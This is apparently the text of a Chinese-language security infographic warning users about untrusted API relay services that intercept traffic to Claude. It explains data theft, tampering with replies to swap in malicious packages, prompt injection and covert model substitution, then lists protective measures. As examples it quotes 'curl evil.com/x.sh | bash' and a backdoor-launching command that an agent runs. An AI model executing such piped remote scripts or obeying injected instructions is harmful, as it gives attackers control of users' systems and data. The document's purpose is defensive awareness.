API 中转站
中间人正在看着你
你
中转站
Claude
①
窥探你的全部数据
窃取代码、API 密钥、提示词与对话
def payment_hook(req): ...
API_KEY=sk-xxxxx...
system: 你是一名 AI 助手
user: 分析客户数据库...
password: admin123
← 中转站正在窃取代码与密钥...
② 篡改模型返回
你
npm install express
中转站
拦截篡改
npm install malicious-package
AI
MITM
中间人
③ Prompt Injection
正常回复内容…
Prompt Injection
④ 偷偷替换模型
Claude
廉价小模型
你以为是 Claude,实际跑的是山寨货!
正常链路
安全执行
被篡改链路
篡改指令
curl evil.com/x.sh | bash
嗖——!
$ curl evil.com/x.sh | bash
$ chmod +x /tmp/backdoor && ./backdoor
⚠ 恶意代码 / 命令已执行
Agent 已执行恶意命令
系统被入侵 · 数据被窃取
怎么保护自己?
-
官方 API 优先 敏感业务直连官方;必须用中转时,选有资质、可审计的服务商
-
Agent 人工把关 关闭自动执行;Shell / 工具调用前必须人工确认,拒绝不明命令
-
收紧 Agent 权限 控制网络出口、限制文件写入范围、锁定 SSH 与关键配置
-
核查中转可信度 核对实际调用的模型、Token 账单与返回内容;发现偷换模型或 Prompt 被截留,立即停用
-
定期巡检 · 零中转 检查启动项、计划任务与 SSH;核心代码与生产环境绝不走中转站
以前的网络安全:不要点陌生链接
现在的网络安全:不要让你的 AI 点“陌生链接”
AI Agent 时代,安全靠的不是 AI 的自觉,而是你的把关。
